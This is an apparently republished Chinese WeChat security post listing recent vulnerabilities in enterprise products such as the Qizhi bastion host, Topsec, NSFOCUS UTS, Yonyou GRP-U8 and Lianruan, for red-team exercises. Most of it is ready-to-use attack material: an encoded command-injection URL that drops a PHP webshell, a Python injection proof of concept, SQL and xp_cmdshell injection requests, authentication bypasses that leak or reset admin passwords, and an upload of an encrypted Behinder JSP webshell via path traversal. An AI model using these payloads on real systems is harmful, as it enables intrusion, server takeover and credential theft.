点击蓝字 关注我们
齐治堡垒机前台远程命令执行漏洞
1、访问 http://10.20.10.11/listener/cluster_manage.php :返回 "OK".2、访问如下链接即可getshell,执行成功后,生成PHP一句话马3、/var/www/shterm/resources/qrcode/lbj77.php 密码10086https://10.20.10.10/ha_request.php?action=install&ipaddr=10.20.10.11&node_id=1${IFS}|`echo${IFS}" ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUWzEwMDg2XSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9sYmo3Ny5waHAK"|base64${IFS}- d|bash`|${IFS}|echo${IFS}
齐治堡垒机Nday POC
post:/shterm/listener/tui_update.phpdata:a=["t';import os;os.popen('ls')#"]经过情报专家研判,该漏洞是一个未披露已修复的漏洞,相关的披露漏洞为CNVD-2019-20835
绿盟UTS综合威胁探针管理员任意登录
对响应包进行修改,将false更改为true的时候可以泄露管理用户的md5值密码
深信服EDR 3.2.21任意代码执行
天融信TopApp-LB 负载均衡系统sql注入
POST /acc/clsf/report/datasource.php HTTP/1.1Host:Connection: closeAccept: text/javascript, text/html, application/xml, text/xml, */*X-Prototype-Version: 1.6.0.3X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: PHPSESSID=ijqtopbcbmu8d70o5t3kmvgt57Content-Type: application/x-www-form-urlencodedContent-Length: 201t=l&e=0&s=t&l=1&vid=1+union select 1,2,3,4,5,6,7,8,9,substr('a',1,1),11,12,13,14,15,16,17,18,19,20,21,22--+&gid=0&lmt=10&o=r_Speed&asc=false&p=8&lipf=&lipt=&ripf=&ript=&dscp=&proto=&lpf=&lpt=&rpf=&rpt=@。。
用友GRP-u8 注入
POST /Proxy HTTP/1.1Accept: Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0;)Host: hostContent-Length: 357Connection: Keep-AliveCache-Control: no-cachecVer=9.8.0&dp=<R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell 'net user'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>
天融信数据防泄漏系统越权修改管理员密码
=auth_user&action=mod_edit_pwd:默认superman账户uid为1。=auth_user&action=mod_edit_pwdCookie: username=superman;uid=1&pd=Newpasswd&mod_pwd=1&dlp_perm=1
绿盟UTS综合威胁探针接口未授权造成密码泄露
访问 /webapi/v1/system/accountmanage/account使用获取的password登录,后台地址/uts_v2/webstatic/#/dashboard
泛微云桥任意文件读取
联软任意文件上传漏洞
POST /uai/download/uploadfileToPath.htm HTTP/1.1HOST: xxxxx... ...-----------------------------570xxxxxxxxx6025274xxxxxxxx1Content-Disposition: form-data; name="input_localfile"; filename="xxx.jsp"Content-Type: image/png<% import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>-----------------------------570xxxxxxxxx6025274xxxxxxxx1Content-Disposition: form-data; name="uploadpath"../webapps/notifymsg/devreport/-----------------------------570xxxxxxxxx6025274xxxxxxxx1--
本文始发于微信公众号(IDLab):HVV近期漏洞整理
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论